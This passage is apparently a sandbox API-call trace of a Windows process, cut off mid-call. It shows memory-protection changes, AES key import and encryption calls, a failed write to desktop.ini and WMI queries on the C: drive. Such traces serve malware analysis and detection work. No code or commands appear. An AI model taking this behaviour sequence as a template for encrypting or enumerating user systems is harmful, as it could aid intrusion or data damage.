ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x7771175c, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.303] GetCurrentProcess () returned 0xffffffff [0139.303] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x7771175c, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.304] GetCurrentProcess () returned 0xffffffff [0139.304] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711768, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.304] GetCurrentProcess () returned 0xffffffff [0139.304] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711768, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.305] GetCurrentProcess () returned 0xffffffff [0139.305] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117b8, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.305] GetCurrentProcess () returned 0xffffffff [0139.305] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117b8, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.306] GetCurrentProcess () returned 0xffffffff [0139.306] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117bc, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.306] GetCurrentProcess () returned 0xffffffff [0139.306] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117bc, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.307] GetCurrentProcess () returned 0xffffffff [0139.307] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117c8, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.307] GetCurrentProcess () returned 0xffffffff [0139.307] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117c8, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.308] GetCurrentProcess () returned 0xffffffff [0139.308] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117d0, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.308] GetCurrentProcess () returned 0xffffffff [0139.308] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x777117d0, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.309] GetCurrentProcess () returned 0xffffffff [0139.309] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x7771180c, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.309] GetCurrentProcess () returned 0xffffffff [0139.309] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x7771180c, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.310] GetCurrentProcess () returned 0xffffffff [0139.310] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x7771182c, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.310] GetCurrentProcess () returned 0xffffffff [0139.310] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x7771182c, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.311] GetCurrentProcess () returned 0xffffffff [0139.311] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711860, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.311] GetCurrentProcess () returned 0xffffffff [0139.311] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x71ee5f0*=0x77711860, NumberOfBytesToProtect=0x71ee5f4, NewAccessProtection=0x4, OldAccessProtection=0x71ee628 | out: BaseAddress=0x71ee5f0*=0x77711000, NumberOfBytesToProtect=0x71ee5f4, OldAccessProtection=0x71ee628*=0x4) returned 0x0 [0139.312] SetLastError (dwErrCode=0x0) [0139.312] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContext") returned 0x0 [0139.313] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0139.313] CryptAcquireContextW (in: phProv=0x71ef24c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x71ef24c*=0x6ee498) returned 1 [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x1 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemFree (pv=0x7acc28) [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemFree (pv=0x7acc28) [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemFree (pv=0x7acc28) [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemFree (pv=0x7acc28) [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.470] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.470] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemFree (pv=0x7acc28) [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemFree (pv=0x7acc28) [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemFree (pv=0x7acc28) [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemFree (pv=0x7acc28) [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.471] CoTaskMemFree (pv=0x7acc28) [0139.471] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemFree (pv=0x7acc28) [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemFree (pv=0x7acc28) [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemFree (pv=0x7acc28) [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemFree (pv=0x7acc28) [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.472] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.472] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemFree (pv=0x7acc28) [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemFree (pv=0x7acc28) [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemFree (pv=0x7acc28) [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemFree (pv=0x7acc28) [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemFree (pv=0x7acc28) [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.473] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.473] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.474] CoTaskMemFree (pv=0x7acc28) [0139.474] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 1 [0139.474] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.474] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x71ef210) returned 1 [0139.474] CoTaskMemFree (pv=0x7acc28) [0139.474] CryptGetProvParam (in: hProv=0x6ee498, dwParam=0x1, pbData=0x0, pdwDataLen=0x71ef210, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x71ef210) returned 0 [0141.770] CryptGenRandom (in: hProv=0x6ee498, dwLen=0x10, pbBuffer=0x33b8844 | out: pbBuffer=0x33b8844) returned 1 [0144.923] CryptImportKey (in: hProv=0x6ee498, pbData=0x346fc40, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x71ef21c | out: phKey=0x71ef21c*=0x77b2f0) returned 1 [0144.923] CryptContextAddRef (hProv=0x6ee498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.923] CryptContextAddRef (hProv=0x6ee498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.923] CryptDuplicateKey (in: hKey=0x77b2f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x71ef20c | out: phKey=0x71ef20c*=0x77b330) returned 1 [0144.923] CryptContextAddRef (hProv=0x6ee498, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.923] CryptSetKeyParam (hKey=0x77b330, dwParam=0x4, pbData=0x346fd20*=0x1, dwFlags=0x0) returned 1 [0144.923] CryptSetKeyParam (hKey=0x77b330, dwParam=0x1, pbData=0x346fcec, dwFlags=0x0) returned 1 [0144.923] CryptEncrypt (in: hKey=0x77b330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x346fd30*, pdwDataLen=0x71ef278*=0xb0, dwBufLen=0xb0 | out: pbData=0x346fd30*, pdwDataLen=0x71ef278*=0xb0) returned 1 [0144.923] CryptEncrypt (in: hKey=0x77b330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x346fe04*, pdwDataLen=0x71ef280*=0x0, dwBufLen=0x10 | out: pbData=0x346fe04*, pdwDataLen=0x71ef280*=0x10) returned 1 [0146.828] CryptDestroyKey (hKey=0x77b2f0) returned 1 [0146.828] CryptReleaseContext (hProv=0x6ee498, dwFlags=0x0) returned 1 [0146.828] CryptReleaseContext (hProv=0x6ee498, dwFlags=0x0) returned 1 [0146.828] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x71eecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0146.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1e4) returned 1 [0146.828] CreateFileW (lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ee020) returned 1 [0148.199] CoTaskMemAlloc (cb=0x20c) returned 0x70b7b8 [0148.199] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x70b7b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.199] CoTaskMemFree (pv=0x70b7b8) [0148.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.199] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef220 | out: ppv=0x71ef220*=0x72015c) returned 0x0 [0148.199] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef218 | out: pAptType=0x71ef218*=1) returned 0x0 [0148.199] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef21c | out: ppvObject=0x71ef21c*=0x0) returned 0x80004002 [0148.199] IUnknown:Release (This=0x72015c) returned 0x1 [0148.200] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb88 | out: ppv=0x71eeb88*=0x6736f88) returned 0x0 [0148.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f88, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eeda0 | out: ppvObject=0x71eeda0*=0x0) returned 0x80004002 [0148.201] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f88, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eedb4 | out: ppvObject=0x71eedb4*=0x6738150) returned 0x0 [0148.201] WbemDefPath:IUnknown:Release (This=0x6736f88) returned 0x0 [0148.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee9d4 | out: ppvObject=0x71ee9d4*=0x6738150) returned 0x0 [0148.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee990 | out: ppvObject=0x71ee990*=0x0) returned 0x80004002 [0148.201] WbemDefPath:IUnknown:AddRef (This=0x6738150) returned 0x3 [0148.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee2ec | out: ppvObject=0x71ee2ec*=0x0) returned 0x80004002 [0148.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0148.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee2a8 | out: ppvObject=0x71ee2a8*=0x77dbe8) returned 0x0 [0148.201] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dbe8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee2b0 | out: pCid=0x71ee2b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.201] WbemDefPath:IUnknown:Release (This=0x77dbe8) returned 0x3 [0148.201] CoGetContextToken (in: pToken=0x71ee308 | out: pToken=0x71ee308) returned 0x0 [0148.202] CoGetContextToken (in: pToken=0x71ee710 | out: pToken=0x71ee710) returned 0x0 [0148.202] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee7a0 | out: ppvObject=0x71ee7a0*=0x0) returned 0x80004002 [0148.202] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x2 [0148.202] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x1 [0148.202] CoGetContextToken (in: pToken=0x71ef098 | out: pToken=0x71ef098) returned 0x0 [0148.202] CoGetContextToken (in: pToken=0x71eeff8 | out: pToken=0x71eeff8) returned 0x0 [0148.202] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x71ef0c8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef0c4 | out: ppvObject=0x71ef0c4*=0x6738150) returned 0x0 [0148.202] WbemDefPath:IUnknown:AddRef (This=0x6738150) returned 0x3 [0148.203] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x2 [0148.203] WbemDefPath:IWbemPath:SetText (This=0x6738150, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738150, puCount=0x71ef24c | out: puCount=0x71ef24c*=0x0) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetText (in: This=0x6738150, lFlags=2, puBuffLength=0x71ef248*=0x0, pszText=0x0 | out: puBuffLength=0x71ef248*=0x20, pszText=0x0) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetText (in: This=0x6738150, lFlags=2, puBuffLength=0x71ef248*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef248*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738150, uRequestedInfo=0x0, puResponse=0x71ef254 | out: puResponse=0x71ef254*=0xc19) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738150, puCount=0x71ef24c | out: 